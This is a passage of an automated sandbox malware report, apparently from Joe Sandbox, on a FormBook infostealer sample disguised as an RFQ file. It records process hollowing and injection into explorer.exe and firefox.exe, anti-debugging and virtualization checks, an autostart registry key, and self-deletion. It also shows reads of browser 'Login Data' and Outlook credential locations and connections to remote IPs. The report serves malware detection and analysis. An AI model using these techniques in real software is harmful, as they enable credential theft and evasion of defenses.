      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE2820 NtCreateSection,8_2_00BE2820
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE2870 NtMapViewOfSection,8_2_00BE2870
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE2BC0 NtCreateFile,8_2_00BE2BC0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE2CF0 NtClose,8_2_00BE2CF0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE2BBA NtCreateFile,8_2_00BE2BBA
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE2CEA NtClose,8_2_00BE2CEA
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_013769020_2_01376902
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_024322500_2_02432250
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023783EB0_2_023783EB
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023A20EA0_2_023A20EA
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023A47360_2_023A4736
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_024404040_2_02440404
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023C645A0_2_023C645A
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0239C4470_2_0239C447
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023744FC0_2_023744FC
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023D24E10_2_023D24E1
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0239E4D70_2_0239E4D7
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_024365000_2_02436500
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023A25CB0_2_023A25CB
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023C2ADC0_2_023C2ADC
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0241EB7D0_2_0241EB7D
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0237CBA70_2_0237CBA7
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_02390BFB0_2_02390BFB
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_02434BBA0_2_02434BBA
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023A28A30_2_023A28A3
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0241C8890_2_0241C889
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023C29EE0_2_023C29EE
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_024449900_2_02444990
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_02380E520_2_02380E52
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023EAEF50_2_023EAEF5
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0238EEC70_2_0238EEC7
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023A2CAF0_2_023A2CAF
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0241ADC50_2_0241ADC5
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0237F2020_2_0237F202
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023D72C30_2_023D72C3
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023C70150_2_023C7015
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023770780_2_02377078
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0243B0E70_2_0243B0E7
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_024350A50_2_024350A5
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023A30CF0_2_023A30CF
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023931090_2_02393109
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023991F70_2_023991F7
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023896B90_2_023896B9
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023A36AC0_2_023A36AC
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BD38F08_2_00BD38F0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BD38ED8_2_00BD38ED
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE71A08_2_00BE71A0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE6AD28_2_00BE6AD2
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE5B268_2_00BE5B26
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE5EDB8_2_00BE5EDB
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE5F4B8_2_00BE5F4B
      Source: C:\Program Files\Modpl\winb2k.exeCode function: 9_2_00E569029_2_00E56902
      Source: Joe Sandbox ViewDropped File: C:\Program Files\Modpl\winb2k.exe A83DED2C7E7D33354EB933F465D2E300C1047BB8470B3BC7BEB7DAE83228B3E0
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Modpl\winb2k.exe A83DED2C7E7D33354EB933F465D2E300C1047BB8470B3BC7BEB7DAE83228B3E0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: String function: 00BE4360 appears 39 times
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: String function: 023C2824 appears 73 times
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: String function: 02391ACE appears 87 times
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: String function: 0240F3E2 appears 65 times
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: String function: 023A3D00 appears 38 times
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: String function: 0238F63B appears 156 times
      Source: ScanRFQ_569585.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: winb2k.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: winb2k.exe0.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: ScanRFQ_569585.exe, 00000000.00000002.733519701.0015B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs ScanRFQ_569585.exe
      Source: ScanRFQ_569585.exe, 00000000.00000003.687909041.02302000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ScanRFQ_569585.exe
      Source: C:\Windows\System32\cmd.exeSection loaded: mozglue.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: winsqlite3.dllJump to behavior
      Source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/6@5/3
      Source: C:\Windows\explorer.exeFile created: C:\Program Files\ModplJump to behavior
      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\-6R-1S2UJump to behavior
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ModplJump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4...<........}......................................!...@@ .|....J'.........X....F.J........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d..............n*.....V..J....................#..u....&...`.....,.....Jump to behavior
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCommand line argument: ShowDib10_2_013712C0
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCommand line argument: ShowDib10_2_013712C0
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCommand line argument: ShowDib10_2_013712C0
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCommand line argument: ShowDib10_2_013712C0
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCommand line argument: ShowDib10_2_013712C0
      Source: C:\Program Files\Modpl\winb2k.exeCommand line argument: ShowDib19_2_00E512C0
      Source: C:\Program Files\Modpl\winb2k.exeCommand line argument: ShowDib19_2_00E512C0
      Source: C:\Program Files\Modpl\winb2k.exeCommand line argument: ShowDib19_2_00E512C0
      Source: C:\Program Files\Modpl\winb2k.exeCommand line argument: ShowDib19_2_00E512C0
      Source: C:\Program Files\Modpl\winb2k.exeCommand line argument: ShowDib19_2_00E512C0
      Source: C:\Program Files\Modpl\winb2k.exeCommand line argument: >79_2_00E53690
      Source: ScanRFQ_569585.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\cmd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: ScanRFQ_569585.exeVirustotal: Detection: 84%
      Source: ScanRFQ_569585.exeReversingLabs: Detection: 74%
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeFile read: C:\Users\user\Desktop\ScanRFQ_569585.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\ScanRFQ_569585.exe 'C:\Users\user\Desktop\ScanRFQ_569585.exe'
      Source: unknownProcess created: C:\Windows\System32\autochk.exe C:\Windows\System32\autochk.exe
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
      Source: unknownProcess created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\ScanRFQ_569585.exe'
      Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: unknownProcess created: C:\Program Files\Modpl\winb2k.exe C:\Program Files\Modpl\winb2k.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Modpl\winb2k.exe C:\Program Files\Modpl\winb2k.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\ScanRFQ_569585.exe'Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ad05575-8857-4850-9277-11b85bdb8e09}\InProcServer32Jump to behavior
      Source: C:\Windows\System32\cmd.exeFile written: C:\Users\user\AppData\Roaming\-6R-1S2U\-6Rlogri.iniJump to behavior
      Source: C:\Windows\System32\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: C:\Windows\explorer.exeDirectory created: C:\Program Files\ModplJump to behavior
      Source: C:\Windows\explorer.exeDirectory created: C:\Program Files\Modpl\winb2k.exeJump to behavior
      Source: ScanRFQ_569585.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: ScanRFQ_569585.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: ScanRFQ_569585.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: ScanRFQ_569585.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: ScanRFQ_569585.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: ScanRFQ_569585.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: ScanRFQ_569585.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: ScanRFQ_569585.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: cmd.pdb,$ source: ScanRFQ_569585.exe, 00000000.00000002.748532503.013D0000.00000040.00000001.sdmp
      Source: Binary string: ntdll.pdb source: ScanRFQ_569585.exe
      Source: Binary string: C:\Users\Good Gold\Desktop\SHOWDIB1\Release\SHOWDIB1.pdbxx source: ScanRFQ_569585.exe
      Source: Binary string: C:\Users\Good Gold\Desktop\SHOWDIB1\Release\SHOWDIB1.pdb source: ScanRFQ_569585.exe
      Source: Binary string: cmd.pdb source: ScanRFQ_569585.exe, 00000000.00000002.748532503.013D0000.00000040.00000001.sdmp
      Source: Binary string: ntdll.pdb3 source: ScanRFQ_569585.exe, 00000000.00000003.687648611.02220000.00000004.00000001.sdmp
      Source: ScanRFQ_569585.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: ScanRFQ_569585.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: ScanRFQ_569585.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: ScanRFQ_569585.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: ScanRFQ_569585.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0137463A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0137463A
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_013731C5 push ecx; ret 0_2_013731D8
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023C2869 push ecx; ret 0_2_023C287C
      Source: C:\Program Files\Modpl\winb2k.exeCode function: 9_2_00E531C5 push ecx; ret 9_2_00E531D8

      Source: C:\Windows\explorer.exeFile created: C:\Program Files\Modpl\winb2k.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Modpl\winb2k.exeJump to dropped file

      Boot Survival:

      barindex
      Creates an undocumented autostart registry key Show sources
      Source: C:\Windows\System32\cmd.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run JNUDV4J0CJump to behavior

      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeRDTSC instruction interceptor: First address: 000DBC3C second address: 000DBC42 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeRDTSC instruction interceptor: First address: 000DBEA6 second address: 000DBEAC instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\System32\cmd.exeRDTSC instruction interceptor: First address: 00067244 second address: 0006724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\System32\cmd.exeRDTSC instruction interceptor: First address: 000674AE second address: 000674B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0244018E rdtsc 0_2_0244018E
      Source: C:\Program Files\Modpl\winb2k.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_9-3763
      Source: C:\Windows\explorer.exe TID: 3908Thread sleep count: 33 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3908Thread sleep time: -66000s >= -30000sJump to behavior
      Source: C:\Windows\System32\cmd.exe TID: 3872Thread sleep time: -65000s >= -30000sJump to behavior
      Source: C:\Windows\System32\cmd.exe TID: 4008Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeAPI call chain: ExitProcess graph end nodegraph_0-48209
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeProcess information queried: ProcessInformationJump to behavior

      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeSystem information queried: KernelDebuggerInformationJump to behavior
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0244018E rdtsc 0_2_0244018E
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_01371B28 IsDebuggerPresent,0_2_01371B28
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0137463A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0137463A
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0137463A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0137463A
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_023B6B80 mov eax, dword ptr fs:[00000030h]0_2_023B6B80
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_0137221F GetProcessHeap,0_2_0137221F
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_013730DB SetUnhandledExceptionFilter,0_2_013730DB
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_013730FE SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_013730FE
      Source: C:\Program Files\Modpl\winb2k.exeCode function: 9_2_00E530DB SetUnhandledExceptionFilter,9_2_00E530DB
      Source: C:\Program Files\Modpl\winb2k.exeCode function: 9_2_00E530FE SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00E530FE

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Benign windows process drops PE filesShow sources
      Source: C:\Windows\explorer.exeFile created: winb2k.exe.2.drJump to dropped file
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 202.208.204.153 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 35.242.251.130 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.17.201.73 80Jump to behavior
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeSection loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeSection loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeThread register set: target process: 1216Jump to behavior
      Source: C:\Windows\System32\cmd.exeThread register set: target process: 1216Jump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeSection unmapped: C:\Windows\System32\cmd.exe base address: 4A1C0000Jump to behavior
      Source: C:\Windows\System32\cmd.exeSection unmapped: C:\Program Files\Mozilla Firefox\firefox.exe base address: 11F0000Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\ScanRFQ_569585.exe'Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: explorer.exe, 00000002.00000000.689914178.00970000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000002.00000000.689914178.00970000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000002.00000000.689914178.00970000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000000.689518588.0087D000.00000004.00000020.sdmpBinary or memory string: ProgmanpD

      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_013763D5 cpuid 0_2_013763D5
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exeCode function: 0_2_01372ECE GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,0_2_01372ECE

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORY
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Tries to steal Mail credentials (via file access)Show sources
      Source: C:\Windows\System32\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

      Remote Access Functionality:

      bar